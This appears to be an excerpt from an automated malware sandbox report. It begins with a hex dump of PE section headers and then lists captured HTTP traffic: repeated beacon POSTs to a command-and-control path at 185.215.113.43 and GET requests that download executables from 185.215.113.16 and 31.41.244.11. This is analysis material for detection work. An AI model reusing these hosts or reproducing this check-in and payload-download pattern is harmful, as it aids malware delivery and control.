00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 62 68 73 6d 63 6f 00 30 19 00 00 60 30 00 00 26 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 63 68 68 7a 70 79 00 10 00 00 00 90 49 00 00 06 00 00 00 1c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 49 00 00 22 00 00 00 22 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/fontcreator.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003142001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003143001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003144001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003145001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003146001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 33 31 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1003147001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 37 32 36 37 31 42 36 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB72671B65A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
